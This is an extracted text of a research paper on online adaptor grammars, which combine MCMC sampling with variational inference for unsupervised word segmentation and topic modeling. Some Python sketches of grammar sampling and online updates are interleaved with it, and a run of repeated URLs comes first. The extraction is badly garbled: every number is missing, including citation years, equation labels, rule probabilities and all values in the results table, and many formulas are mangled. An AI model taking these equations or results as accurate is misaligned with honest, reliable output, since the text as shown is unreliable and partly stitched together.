http://www.mathworks.com/matlabcentral/fileexchange/ http://www.mathworks.com/matlabcentral/fileexchange/ http://www.mathworks.com/matlabcentral/fileexchange/ http://www.mathworks.com/matlabcentral/fileexchange/ http://www.mathworks.com/matlabcentral/fileexchange/ http://www.mathworks.com/matlabcentral/fileexchange/ http://www.mathworks.com/matlabcentral/fileexchange/ http://www.mathworks.com/matlabcentral/fileexchange/ http://www.mathworks.com/matlabcentral/fileexchange/ http://www.mathworks.com/matlabcentral/fileexchange/ http://www.mathworks.com/matlabcentral/fileexchange/ http://www.mathworks.com/matlabcentral/fileexchange/ http://www.mathworks.com/matlabcentral/fileexchange/ http://www.mathworks.com/matlabcentral/fileexchange/ http://www.mathworks.com/matlabcentral/fileexchange/ http://www.mathworks.com/matlabcentral/fileexchange/ http://www.mathworks.com/matlabcentral/fileexchange/ http://www.mathworks.com/matlabcentral/fileexchange/ http://www.mathworks.com/matlabcentral/fileexchange/ http://www.mathworks.com/matlabcentral/fileexchange/ http://www.mathworks.com/matlabcentral/fileexchange/ http://www.mathworks.com/matlabcentral/fileexchange/ http://www.mathworks.com/matlabcentral/fileexchange/ http://www.mathworks.com/matlabcentral/fileexchange/ http://www.mathworks.com/matlabcentral/fileexchange/ http://www.mathworks.com/matlabcentral/fileexchange/ http://www.mathworks.com/matlabcentral/fileexchange/ http://www.mathworks.com/matlabcentral/fileexchange/ http://www.mathworks.com/matlabcentral/fileexchange/ http://www.mathworks.com/matlabcentral/fileexchange/ http://www.mathworks.com/matlabcentral/fileexchange/ http://www.mathworks.com/matlabcentral/fileexchange/ http://www.mathworks.com/matlabcentral/fileexchange/ http://www.mathworks.com/matlabcentral/fileexchange/ http://www.mathworks.com/matlabcentral/fileexchange/ http://www.mathworks.com/matlabcentral/fileexchange/ http://www.mathworks.com/matlabcentral/fileexchange/ http://www.mathworks.com/matlabcentral/fileexchange/ http://www.mathworks.com/matlabcentral/fileexchange/ 
online adaptor grammars with hybrid inference
ke zhai, computer science and umiacs, university of maryland, college park, md usa, zhaike@cs.umd.edu
jordan boyd-graber, computer science, university of colorado, boulder, co usa, jordan.boyd.graber@colorado.edu
shay b. cohen, school of informatics, university of edinburgh, edinburgh, scotland, uk, scohen@inf.ed.ac.uk

abstract
adaptor grammars are a flexible, powerful formalism for defining nonparametric, unsupervised models of grammar productions. this flexibility comes at the cost of expensive inference. we address the difficulty of inference through an online algorithm which uses a hybrid of markov chain monte carlo and variational inference. we show that this inference strategy improves scalability without sacrificing performance on unsupervised word segmentation and topic modeling tasks.

introduction
nonparametric bayesian models are effective tools to discover latent structure in data (müller and quintana, ).
these models have had great success in text analysis, especially syntax (shindo et al., ). nonparametric distributions provide support over a countably infinite long-tailed distributions common in natural language (goldwater et al., ). we focus on adaptor grammars (johnson et al., ), syntactic nonparametric models based on probabilistic context-free grammars. adaptor gram- mars weaken the strong statistical independence as- sumptions pcfgs make (section ). the weaker statistical independence assumptions that adaptor grammars make come at the cost of ex- pensive inference. adaptor grammars are not alone in this trade-off. for example, nonparametric exten- sions of topic models (teh et al., ) have substan- tially more expensive inference than their parametric counterparts (yao et al., ). a common approach to address this compu- tational bottleneck is through variational infer- ence (wainwright and jordan, ). one of the advantages of variational inference is that it can be easily parallelized (nallapati et al., ) or trans- formed into an online algorithm (hoffman et al., ), which often converges in fewer iterations than batch variational inference. past variational inference techniques for adap- tor grammars assume a preprocessing step that looks at all available data to establish the support of these nonparametric distributions (cohen et al., ). thus, these past approaches are not directly amenable to online inference. markov chain monte carlo (mcmc) inference, an alternative to variational inference, does not have this disadvantage. mcmc is easier to implement, and it discovers the support of nonparametric mod- els during inference rather than assuming it a priori. we apply stochastic hybrid inference (mimno et al., ) to adaptor grammars to get the best of both worlds. we interleave mcmc inference inside vari- ational inference. this preserves the scalability of variational inference while adding the sparse statis- tics and improved exploration mcmc provides. our inference algorithm for adaptor grammars starts with a variational algorithm similar to cohen et al. ( ) and adds hybrid sampling within varia- tional inference (section ). this obviates the need for expensive preprocessing and is a necessary step to create an online algorithm for adaptor grammars. our online extension (section ) processes exam- ples in small batches taken from a stream of data. as data arrive, the algorithm dynamically extends the underlying approximate posterior distributions as more data are observed. this makes the algo- rithm flexible, scalable, and amenable to datasets that cannot be examined exhaustively because of their size—e.g., terabytes of social media data ap- pear every second—or their nature—e.g., speech ac- quisition, where a language learner is limited to the bandwidth of the human perceptual system and can- not acquire data in a monolithic batch (börschinger and johnson, ). we show our approach’s scalability and effective- ness by applying our inference framework in sec- tion on two tasks: unsupervised word segmenta- tion and infinite-vocabulary topic modeling. background in this section, we review probabilistic context-free grammars and adaptor grammars. . probabilistic context-free grammars probabilistic context-free grammars (pcfg) de- fine probability distributions over derivations of a context-free grammar. we define a pcfg g to be a tuple 〈w ,n,r,s,θ〉: a set of terminals w , a set of nonterminals n, productions r, start sym- bol s ∈ n and a vector of rule probabilities θ. 
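to make the tuple 〈w, n, r, s, θ〉 concrete, the following sketch encodes a toy grammar and samples a derivation by recursively rewriting nonterminals. the grammar, the rule probabilities, and the function names are illustrative assumptions rather than anything taken from the paper's implementation; python is used only because the authors' own system is implemented in python.

```python
import random

# a toy pcfg: in this example, nonterminals are the keys of THETA and
# terminals are any symbol that never appears as a key.
# THETA maps each nonterminal c to a multinomial over the rules R(c):
# a list of (right-hand side, probability) pairs.
THETA = {
    "S":  [(("NP", "VP"), 1.0)],
    "NP": [(("she",), 0.5), (("cake",), 0.5)],
    "VP": [(("V", "NP"), 1.0)],
    "V":  [(("eats",), 0.6), (("bakes",), 0.4)],
}

def sample_tree(symbol="S"):
    """recursively rewrite `symbol` until only terminals remain;
    returns a nested (symbol, children) pair, i.e., a phrase-structure tree."""
    if symbol not in THETA:                      # terminal symbol: stop rewriting
        return symbol
    options = THETA[symbol]
    rhs_list = [rhs for rhs, _ in options]
    probs = [p for _, p in options]
    rhs = random.choices(rhs_list, weights=probs, k=1)[0]
    return (symbol, [sample_tree(child) for child in rhs])

def yield_of(tree):
    """collect the terminals (the yield) of a sampled tree, left to right."""
    if isinstance(tree, str):
        return [tree]
    _, children = tree
    return [word for child in children for word in yield_of(child)]

if __name__ == "__main__":
    tree = sample_tree()
    print(tree)
    print(" ".join(yield_of(tree)))
```

in the unsupervised setting assumed throughout the paper, only the yield is observed and the tree that produced it is latent.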
the rules that rewrite nonterminal c is r(c). for a more complete description of pcfgs, see manning and schütze ( ). pcfgs typically use nonterminals with a syntactic interpretation. a sequence of terminals (the yield) is generated by recursively rewriting nonterminals as sequences of child symbols (either a nonterminal or a symbol). this builds a hierarchical phrase-tree structure for every yield. for example, a nonterminal vp represents a verb phrase, which probabilistically rewrites into a se- quence of nonterminals v, n (corresponding to verb and noun) using the production rule vp → v n. both nonterminals can be further rewritten. each nonterminal has a multinomial distribution over ex- pansions; for example, a multinomial for nonter- minal n would rewrite as “cake”, with probability θn→cake = . . rewriting terminates when the derivation has reached a terminal symbol such as “cake” (which does not rewrite). while pcfgs are used both in the supervised set- ting and in the unsupervised setting, in this paper we assume an unsupervised setting, in which only terminals are observed. our goal is to predict the underlying phrase-structure tree. . adaptor grammars pcfgs assume that the rewriting operations are in- dependent given the nonterminal. this context- freeness assumption often is too strong for modeling natural language. adaptor grammars break this independence as- sumption by transforming a pcfg’s distribution over algorithm generative process : for nonterminals c ∈ n, draw rule probabilities θc ∼ dir(αc) for pcfg g. : for adapted nonterminal c in c , . . . ,c|m| do : draw grammaton hc ∼ pygem(ac,bc,gc) according to equation , where gc is defined by the pcfg rules r. : for i ∈ { , . . . ,d}, generate a phrase-structure tree ts,i using the pcfg rules r(e) at non-adapted nonterminal e and the grammatons hc at adapted nonterminals c. : the yields of trees t , . . . , td are observations x , . . . ,xd. trees gc rooted at nonterminal c into a richer distri- bution hc over the trees headed by a nonterminal c, which is often referred to as the grammaton. a pitman-yor adaptor grammar (pyag) forms the adapted tree distributions hc using a pitman-yor process (pitman and yor, , py), a generalization of the dirichlet process (ferguson, , dp). a draw hc ≡ (πc,zc) is formed by the stick break- ing process (sudderth and jordan, , pygem) parametrized by scale parameter a, discount factor b, and base distribution gc: π′k ∼beta( − b,a + kb), zk ∼gc, πk ≡π′k ∏k− j= ( −π ′ j), h ≡ ∑ k πkδzk. ( ) intuitively, the distribution hc is a discrete recon- struction of the atoms sampled from gc—hence, reweights gc. grammaton hc assigns non-zero stick-breaking weights π to a countably infinite number of parse trees z. we describe learning these grammatons in section . more formally, a pyag is a quintuple a = 〈g,m,a,b,α〉 with: a pcfg g; a set of adapted nonterminals m ⊆ n; pitman-yor process param- eters ac,bc at each adaptor c ∈ m and dirichlet parameters αc for each nonterminal c ∈ n. we also assume an order on the adapted nonterminals, c , . . . ,c|m| such that cj is not reachable from ci in a derivation if j > i. algorithm describes the generative process of an adaptor grammar on a set of d observed sen- tences x , . . . ,xd. adaptor grammars, in their general form, do not have to use the pitman-yor process but have only been used with the pitman-yor process. this is possible because we assume that recursive nonter- minals are not adapted. 
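operationally, the grammaton in the generative process above can be simulated with the chinese-restaurant view of the pitman-yor process that the paper later uses to explain seating assignments: an adapted nonterminal either reuses a previously generated subtree or falls back to the base pcfg. the sketch below layers such an adaptor over the toy sampler from the previous block; the class name and bookkeeping details are assumptions, and the reuse probabilities follow the standard pitman-yor predictive rule with scale a and discount b.

```python
import random

class PitmanYorAdaptor:
    """chinese-restaurant-style cache for one adapted nonterminal c:
    reuse cached subtree z_k with probability (n_k - b) / (n + a),
    or draw a fresh subtree from the base distribution g_c with
    probability (a + K*b) / (n + a), where K is the number of cached
    subtrees and n the total reuse count."""

    def __init__(self, a, b, base_sampler):
        self.a, self.b = a, b          # scale a and discount b, as in pygem(a, b, g)
        self.base_sampler = base_sampler
        self.cached_trees = []         # the atoms z_k
        self.counts = []               # n_k for each cached subtree

    def sample(self):
        n = sum(self.counts)
        k = len(self.cached_trees)
        new_mass = self.a + k * self.b
        r = random.uniform(0.0, n + self.a)
        if k == 0 or r < new_mass:     # "new table": draw from the base pcfg
            tree = self.base_sampler()
            self.cached_trees.append(tree)
            self.counts.append(1)
            return tree
        r -= new_mass
        for i, n_k in enumerate(self.counts):   # "old table": reuse a cached subtree
            r -= n_k - self.b
            if r <= 0.0:
                self.counts[i] += 1
                return self.cached_trees[i]
        self.counts[-1] += 1                     # numerical fall-through guard
        return self.cached_trees[-1]
```

with sample_tree from the previous sketch as the base distribution, repeated calls to PitmanYorAdaptor(a=1.0, b=0.5, sample_tree).sample() exhibit the rich-get-richer reuse of whole subtrees that lets adaptor grammars memorize frequently generated words or collocations.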
given a pyag a, the joint probability for a set of sentences x and its collection of trees t is p(x,t ,π,θ,z|a) = ∏ c∈m p(πc|ac,bc)p(zc|gc) · ∏ c∈n p(θc|αc) ∏ xd∈x p(xd, td|θ,π,z), where xd and td represent the dth observed string and its corresponding parse. the multinomial pcfg parameter θc is drawn from a dirichlet distribution at nonterminal c ∈ n. at each adapted nontermi- nal c ∈ m, the stick-breaking weights πc are drawn from a pygem (equation ). each weight has an as- sociated atom zc,i from base distribution gc, a sub- tree rooted at c. the probability p(xd, td |θ,π,z) is the pcfg likelihood of yield xd with parse tree td. adaptor grammars require a base pcfg such that it does not have recursive adapted nonterminals, i.e., there cannot be a path in a derivation from a given adapted nonterminal to a second appearance of that adapted nonterminal. hybrid variational-mcmc inference discovering the latent variables of the model—trees, adapted probabilities, and pcfg rules—is a problem of posterior inference given observed data. previ- ous approaches use mcmc (johnson et al., ) or variational inference (cohen et al., ). mcmc discovers the support of nonparametric models during the inference, but does not scale to larger datasets (due to tight coupling of variables). variational inference, however, is inherently paral- lel and easily amendable to online inference, but re- quires preprocessing to discover the adapted produc- tions. we combine the best of both worlds and pro- pose a hybrid variational-mcmc inference algorithm for adaptor grammars. variational inference posits a variational distribu- tion over the latent variables in the model; this in turn induces an “evidence lower bound” (elbo, l) as a function of a variational distribution q, a lower bound on the marginal log-likelihood. variational inference optimizes this objective function with re- spect to the parameters that define q. in this section, we derive coordinate-ascent up- dates for these variational parameters. a key math- ematical component is taking expectations with re- spect to the variational distribution q. we strategi- cally use mcmc sampling to compute the expecta- tion of q over parse trees z. instead of explicitly computing the variational distribution for all param- eters, one can sample from it. this produces a sparse approximation of the variational distribution, which improves both scalability and performance. sparse distributions are easier to store and transmit in im- plementations, which improves scalability. mimno et al. ( ) also show that sparse representations improve performance. moreover, because it can flexibly adjust its support, it is a necessary prereq- uisite to online inference (section ). . variational lower bound we posit a mean-field variational distribution: q(π,θ,t |γ,ν,φ) = ∏ c∈m ∏∞ i= q(π ′ c,i|ν c,i,ν c,i) · ∏ c∈n q(θc|γc) ∏ xd∈x q(td|φd), ( ) where π′c,i is drawn from a variational beta distri- bution parameterized by ν c,i,ν c,i; and θc is from a variational dirichlet prior γc ∈ r |r(c)| + . index i ranges over a possibly infinite number of adapted rules. the parse for the dth observation, td is mod- eled by a multinomial φd, where φd,i is the proba- bility generating the ith phrase-structure tree td,i. 
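in the hybrid scheme described next, the multinomial φd is never represented densely: it is approximated by the empirical distribution of a handful of sampled derivations (ten per sentence in the paper's experiments). a minimal sketch of that bookkeeping follows, assuming parse trees are represented by any hashable encoding; the helper name is hypothetical.

```python
from collections import Counter

def empirical_phi(sampled_trees):
    """sparse approximation of the tree distribution phi_d for one sentence:
    each distinct sampled derivation receives probability equal to its
    relative frequency among the samples; all other trees implicitly get
    probability zero and need no storage."""
    counts = Counter(sampled_trees)
    total = sum(counts.values())
    return {tree: count / total for tree, count in counts.items()}

# e.g. empirical_phi(["t1", "t1", "t2"]) -> {"t1": 2/3, "t2": 1/3}
```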
the variational distribution over latent variables induces the following elbo on the likelihood: l(z,π,θ,t ,d; a,b,α) = h[q(θ,π,t )] + ∑ c∈n eq[log p(θc|αc)] ( ) + ∑ c∈m ∑∞ i= eq[log p(π ′ c,i|ac,bc)] + ∑ c∈m ∑∞ i= eq[log p(zc,i |π,θ)] + ∑ xd∈x eq[log p(xd, td |π,θ,z)], where h[•] is the entropy function. to make this lower bound tractable, we truncate the distribution over π to a finite set (blei and jor- dan, ) for each adapted nonterminal c ∈ m, i.e., π′c,kc ≡ for some index kc. because the atom weights πk are deterministically defined by equa- tion , this implies that πc,i is zero beyond index kc. each weight πc,i is associated with an atom zc,i, a subtree rooted at c. we call the ordered set of zc,i the truncated nonterminal grammaton (tng ). each adapted nonterminal c ∈ m has its own tngc. the ith subtree in tngc is denoted tngc(i). in the rest of this section, we describe approxi- mate inference to maximize l. the most impor- tant update is φd,i, which we update using stochastic mcmc inference (section . ). past variational ap- proaches for adaptor grammars (cohen et al., ) rely on a preprocessing step and heuristics to define a static tng . in contrast, our model dynamically discovers trees. the tng grows as the model sees more data, allowing online updates (section ). the remaining variational parameters are opti- mized using expected counts of adaptor grammar rules. these expected counts are described in sec- tion . , and the variational updates for the vari- ational parameters excluding φd,i are described in section . . . stochastic mcmc inference each observation xd has an associated variational multinomial distribution φd over trees td that can yield observation xd with probability φd,i. hold- ing all other variational parameters fixed, the coordinate-ascent update (mimno et al., ; bishop, ) for φd,i is φd,i ∝ exp{e ¬φd q [log p(td,i|xd,π,θ,z)]}, ( ) where φd,i is the probability generating the ith phrase-structure tree td,i and e ¬φd q [•] is the expec- tation with respect to the variational distribution q, excluding the value of φd. instead of computing this expectation explicitly, we turn to stochastic variational inference (mimno et al., ; hoffman et al., ) to sample from this distribution. this produces a set of sampled trees σd ≡ {σd, , . . . ,σd,k}. from this set of trees we can approximate our variational distribution over trees φ using the empirical distribution σd, i.e., φd,i ∝ i[σd,j = td,i,∀σd,j ∈ σd]. ( ) this leads to a sparse approximation of variational distribution φ. previous inference strategies (johnson et al., ; börschinger and johnson, ) for adaptor grammars have used sampling. the adaptor gram- mar inference methods use an approximate pcfg to emulate the marginalized pitman-yor distributions in our experiments, we use ten samples. at each nonterminal. given this approximate pcfg, we can then sample a derivation z for string x from the possible trees (johnson et al., ). sampling requires a derived pcfg g′ that approx- imates the distribution over tree derivations condi- tioned on a yield. it includes the original pcfg rules r = {c → β} that define the base distribution and the new adapted productions r′ = {c ⇒ z,z ∈ tngc}. under g′, the probability θ′ of adapted pro- duction c ⇒ z is log θ′c⇒z =   eq[log πc,i], if tngc(i) = z eq[log πc,kc ] + eq[log θc⇒z], otherwise ( ) where kc is the truncation level of tngc and πc,kc represents the left-over stick weights in the stick- breaking process for adaptor c ∈ m. 
θc⇒z repre- sents the probability of generating tree c ⇒ z under the base distribution. see also cohen ( ). the expectation of the pitman-yor multinomial πc,i under the truncated variational stick-breaking distribution is eq[log πa,i] = Ψ(ν a,i) − Ψ(ν a,i + ν a,i) ( ) + ∑i− j= (Ψ(ν a,j) − Ψ(ν a,j + ν a,j)), and the expectation of generating the phrase- structure tree a ⇒ z based on pcfg productions under the variational dirichlet distribution is eq[log θa⇒z] = ∑ c→β∈a⇒z ( Ψ(γc→β) ( ) − Ψ( ∑ c→β′∈rc γc→β′ ) ) where Ψ(•) is the digamma function, and c → β ∈ a ⇒ z represents all pcfg productions in the phrase-structure tree a ⇒ z. this pcfg can compose arbitrary subtrees and thus discover new trees that better describe the data, even if those trees are not part of the tng . this is equivalent to creating a “new table” in mcmc in- ference and provides truncation-free variational up- dates (wang and blei, ) by sampling a unseen subtree with adapted nonterminal c ∈ m at the root. this frees our model from preprocessing to initial- ize truncated grammatons in cohen et al. ( ). this stochastic approach has the advantage of creat- ing sparse distributions (wang and blei, ): few unique trees will be represented. s→ab b→{a,b,c} a→b b a b b grammar seating assignments (nonterminal a) yield parse counts ca b ca s b a new seating b a b b b c h(a →c) += g(b →c) += g(b →a) += ab b aa s b b b a b b b a h(a →a) += g(b →a) += g(b →b) += ba b ba s b a b a b b f(a →b) += g(b →a) += figure : given an adaptor grammar, we sample derivations given an approximate pcfg and show how these affect counts. the sampled derivations can be understood via the chinese restaurant metaphor (johnson et al., ). existing cached rules (elements in the tng ) can be thought of as occupied ta- bles; this happens in the case of the yield “ba”, which increases counts for unadapted rules g and for entries in tnga, f. for the yield “ca”, there is no appropriate entry in the tng , so it must use the base distribution, which corresponds to sitting at a new table. this generates counts for g, as it uses the unadapted rule and for h, which represents entries that could be included in the tng in the future. the final yield, “ab”, shows that even when compatible entries are in the tng , it might still create a new table, changing the underlying base distribution. parallelization as noted in cohen et al. ( ), the inside-outside algorithm dominates the runtime of every iteration, both for sampling and variational inference. however, unlike mcmc, variational in- ference is highly parallelizable and requires fewer synchronizations per iteration (zhai et al., ). in our approach, both inside algorithms and sampling process can be distributed, and those counts can be aggregated afterwards. in our implementation, we use multiple threads to parallelize tree sampling. . calculating expected rule counts for every observation xd, the hybrid approach pro- duces a set of sampled trees, each of which contains three types of productions: adapted rules, original pcfg rules, and potentially adapted rules. the last set is most important, as these are new rules dis- covered by the sampler. these are explained using the chinese restaurant metaphor in figure . the multiset of all adapted productions is m(td,i) and the multiset of non-adapted productions that gener- ate tree td,i is n(td,i). we compute three counts: : f is the expected number of productions within the tng . 
it is the sum over the probability of a tree td,k times the number of times an adapted production appeared in td,k, fd(a ⇒ za,i) =∑ k ( φd,k |a ⇒ za,i : a ⇒ za,i ∈ m(td,k)|︸ ︷︷ ︸ count of rule a ⇒ za,i in tree td,k ) . : g is the expected counts of pcfg productions r that defines the base distribution of the adaptor grammar, gd(a → β) =∑ k (φd,k |a → β : a → β ∈ n(td,k)|) . : finally, a third set of productions are newly dis- covered by the sampler and not in the tng . these subtrees are rules that could be adapted, with expected counts hd(c ⇒ zc,i) =∑ k (φd,k |c ⇒ zc,i : c ⇒ zc,i /∈ m(td,k)|) . these subtrees—lists of pcfg rules sampled from equation —correspond to adapted pro- ductions not yet present in the tng . . variational updates given the sparse vectors φ sampled from the hybrid mcmc step, we update all variational parameters as γa→β =αa→β + ∑ xd∈x gd(a → β) + ∑ b∈m ∑kb i= n(a → β,zb,i), ν a,i = − ba + ∑ xd∈x fd(a ⇒ za,i) + ∑ b∈m ∑kb k= n(a ⇒ za,i,zb,k), ν a,i =aa + iba + ∑ xd∈x ∑ka j= fd(a ⇒ za,j) + ∑ b∈m ∑kb k= ∑ka j= n(a ⇒ za,j,zb,k), where n(r,t) is the expected number of times pro- duction r is in tree t, estimated during sampling. hyperparameter update we update our pcfg hyperparameter α, pygem hyperparameters a and b as in cohen et al. ( ). online variational inference online inference for probabilistic models requires us to update our posterior distribution as new observa- tions arrive. unlike batch inference algorithms, we do not assume we always have access to the entire dataset. instead, we assume that observations arrive in small groups called minibatches. the advantage of online inference is threefold: a) it does not re- quire retaining the whole dataset in memory; b) each online update is fast; and c) the model usually con- verges faster. all of these make adaptor grammars scalable to larger datasets. our approach is based on the stochastic varia- tional inference for topic models (hoffman et al., ). this inference strategy uses a form of stochastic gradient descent (bottou, ): using the gradient of the elbo, it finds the sufficient statistics necessary to update variational parameters (which are mostly expected counts calculated using the inside-outside algorithm), and interpolates the result with the current model. we assume data arrive in minibatches b (a set of sentences). we accumulate expected counts f̃(l)(a ⇒ za,i) =( − �) · f̃(l− )(a ⇒ za,i) ( ) + � · |x||bl| ∑ xd∈bl fd(a ⇒ za,i), g̃(l)(a → β) =( − �) · g̃(l− )(a → β) ( ) + � · |x||bl| ∑ xd∈bl gd(a → β), with decay factor � ∈ ( , ) to guarantee conver- gence. we set it to � = (τ + l)−κ, where l is the minibatch counter. the decay inertia τ prevents pre- mature convergence, and decay rate κ controls the speed of change in sufficient statistics (hoffman et al., ). we recover batch variational approach when b = d and κ = . the variables f̃(l) and g̃(l) are accumulated suffi- cient statistics of adapted and unadapted productions after processing minibatch bl. they update the ap- proximate gradient. the updates for variational pa- rameters become γa→β =αa→β + g̃ (l)(a → β) ( ) + ∑ b∈m ∑kb i= n(a → β,zb,i), ν a,i = − ba + f̃ (l)(a ⇒ za,i) ( ) + ∑ b∈m ∑kb k= n(a ⇒ za,i,zb,k), ν a,i =aa + iba + ∑ka j= f̃ (l)(a ⇒ za,j) ( ) + ∑ b∈m ∑kb k= ∑ka j= n(a ⇒ za,j,zb,k), where ka is the size of the tng at adaptor a ∈ m. . refining the truncation as we observe more data during inference, our tng s need to change. new rules should be added, useless rules should be removed, and derivations for existing rules should be updated. 
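before describing how the truncations are refined, note that the accumulation of sufficient statistics defined above is just an exponentially decayed, rescaled running average. the sketch below spells this out for one table of production counts; the function and argument names are assumptions for illustration, and the decay hyperparameters τ and κ are left to the caller because the paper selects them by cross-validation.

```python
from collections import defaultdict

def decay(minibatch_index, tau, kappa):
    """step size epsilon = (tau + l) ** (-kappa): tau is the decay inertia,
    kappa the decay rate, l the minibatch counter."""
    return (tau + minibatch_index) ** (-kappa)

def online_update(stats, minibatch_counts, minibatch_index,
                  corpus_size, batch_size, tau, kappa):
    """interpolate accumulated sufficient statistics (the f-tilde / g-tilde
    counts of adapted and unadapted productions) with the counts observed
    in the current minibatch, rescaled to the size of the full corpus."""
    eps = decay(minibatch_index, tau, kappa)
    scale = corpus_size / float(batch_size)
    new_stats = defaultdict(float)
    for rule in set(stats) | set(minibatch_counts):
        new_stats[rule] = ((1.0 - eps) * stats.get(rule, 0.0)
                           + eps * scale * minibatch_counts.get(rule, 0.0))
    return new_stats
```

with κ = 0 the decay is always one, and with a single minibatch equal to the full dataset the rescaling factor is also one, which recovers the batch update as noted above.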
in this section, we describe heuristics for performing each of these operations. adding productions sampling can identify pro- ductions that are not adapted but were instead drawn from the base distribution. these are candidates for the tng . for every nonterminal a, we add these potentially adapted productions to tnga after each minibatch. the count associated with candidate pro- ductions is now associated with an adapted produc- tion, i.e., the h count contributes to the relevant f count. this mechanism dynamically expands tnga. sorting and removing productions our model does not require a preprocessing step to initialize the tng s, rather, it constructs and expands all tng s on the fly. to prevent the tng from growing unwieldy, we prune tng after every u minibatches. as a re- sult, we need to impose an ordering over all the parse trees in the tng . the underlying pygem distribu- tion implicitly places an ranking over all the atoms according to their corresponding sufficient statis- tics (kurihara et al., ), as shown in equation . it measures the “usefulness” of every adapted pro- duction throughout inference process. in addition to accumulated sufficient statistics, cohen et al. ( ) add a secondary term to discour- age short constituents (mochihashi et al., ). we impose a reward term for longer phrases in addition to f̃ and sort all adapted productions in tnga using the ranking score Λ(a ⇒ za,i) = f̃(l)(a ⇒ za,i) · log(� · |s| + ), where |s| is the number of yields in production a ⇒ za,i. because � decreases each minibatch, the reward for long phrases diminishes. this is similar to an annealed version of cohen et al. ( )—where the reward for long phrases is fixed, see also mochihashi et al. ( ). after sorting, we remove all but the top ka adapted productions. rederiving adapted productions for mcmc in- ference, johnson and goldwater ( ) observe that atoms already associated with a yield may have trees algorithm online inference for adaptor grammars : random initialize all variational parameters. : for minibatch of l = , , . . . do : construct approximate pcfg θ′ of a (equation ). : for input sentence d = , , . . . ,dl do : accumulate inside probabilities from approximate pcfg θ′. : sample phrase-structure trees σ and update the tree distribution φ (equation ). : for every adapted nonterminal c, append adapted pro- ductions to tngc. : accumulate sufficient statistics (equations and ). : update γ, ν , and ν (equations - ). : refine and prune the truncation every u minibatches. that do not explain their yield well. they propose ta- ble label resampling to rederive yields. in our approach this is equivalent to “mutating” some derivations in a tng . after pruning rules ev- ery u minibatches, we perform table label resam- pling for adapted nonterminals from general to spe- cific (i.e., a topological sort). this provides better expected counts n(r,•) for rules used in phrase- structure subtrees. empirically, we find table la- bel resampling only marginally improves the word- segmentation result. initialization our inference begins with random variational dirichlets and empty tng s, which obvi- ates the preprocessing step in cohen et al. ( ). our model constructs and expands all tng s on the fly. it mimics the incremental initialization of john- son and goldwater ( ). algorithm summarizes the pseudo-code of our online approach. . complexity inside and outside calls dominate execution time for adaptor grammar inference. 
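returning briefly to the pruning step above: the sketch below ranks the cached productions of one truncated grammaton by the score Λ and keeps only the top k. the container layout and helper names are assumptions, and the additive constant inside the logarithm is assumed to be one because its exact value is elided in the extracted text.

```python
import math

def ranking_score(f_tilde, yield_length, eps):
    """usefulness of an adapted production: accumulated count times a
    (decaying) reward for longer yields; the additive constant inside the
    log is assumed to be 1 in this sketch."""
    return f_tilde * math.log(eps * yield_length + 1.0)

def prune_tng(tng_yield_lengths, f_tilde, eps, k_max):
    """keep only the k_max highest-ranked adapted productions of one tng.
    `tng_yield_lengths` maps each production to the length of its yield;
    `f_tilde` maps each production to its accumulated sufficient statistic."""
    ranked = sorted(tng_yield_lengths,
                    key=lambda prod: ranking_score(f_tilde.get(prod, 0.0),
                                                   tng_yield_lengths[prod],
                                                   eps),
                    reverse=True)
    return {prod: tng_yield_lengths[prod] for prod in ranked[:k_max]}
```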
variational ap- proaches compute inside-outside algorithms and es- timate the expected counts for every possible tree derivation (cohen et al., ). for a dataset with d observations, variational inference requires o ( di ) calls to inside-outside algorithm, where i is the number of iterations, typically in the tens. in contrast, mcmc only needs to accumulate in- side probabilities, and then sample a tree deriva- tion (chappelier and rajman, ). the sampling step is negligible in processing time compared to the inside algorithm. mcmc inference requires o ( di ) calls to the inside algorithm—hence every iteration co ll oc at io n sent → colloc sent → colloc sent colloc → words un ig ra m words → word words → word words word → chars chars → char chars → char chars char → ? in fv oc l d a sent → docj j= , , . . . d docj →−j topici i= , , . . . k topici → word word → chars chars → char chars → char chars char → ? table : grammars used in our experiments. the nonterminal char is a non-adapted rule that expands to all characters used in the data, sometimes called pre-terminals. adapted nonter- minals are underlined. for the unigram grammar, only nonter- minal word is adapted; whereas for the collocation grammar, both nonterminals word and colloc are adapted. for the in- fvoc lda grammar, d is the total number of documents and k is the number of topics. therefore, j ranges over { , . . . ,d} and i ranges over { , . . . ,k}. is much faster than variational approach—but i is usually on the order of thousands. likewise, our hybrid approach also only needs the less expensive inside algorithm to sample trees. and while each iteration is less expensive, our ap- proach can achieve reasonable results with only a single pass through the data. and thus only requires o(d) calls to the inside algorithm. because the inside-outside algorithm is funda- mental to each of these algorithms, we use it as a common basis for comparison across different im- plementations. this is over-generous to variational approaches, as the full inside-outside computation is more expensive than the inside probability computa- tion required for sampling in mcmc and our hybrid approach. experiments and discussion we implement our online adaptor grammar model (online) in python and compare it against both mcmc (johnson and goldwater, , mcmc) and the variational inference (cohen et al., , vari- ational). we use the latest implementation of mcmc sampler for adaptor grammars and simulate the variational approach using our implementation. for mcmc approach, we use the best settings re- ported in johnson and goldwater ( ) with incre- mental initialization and table label resampling. available at http://www.umiacs.umd.edu/˜zhaike/. http://web.science.mq.edu.au/˜mjohnson/code/ py-cfg- - - .tgz model and settings ctb pku cityu unigram collocation unigram collocation unigram collocation m c m c iter . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) iter . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) iter . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) iter . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) o n l in e κ τ kword = k kcolloc = k kword = k kcolloc = k kword = k kcolloc = k . . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . 
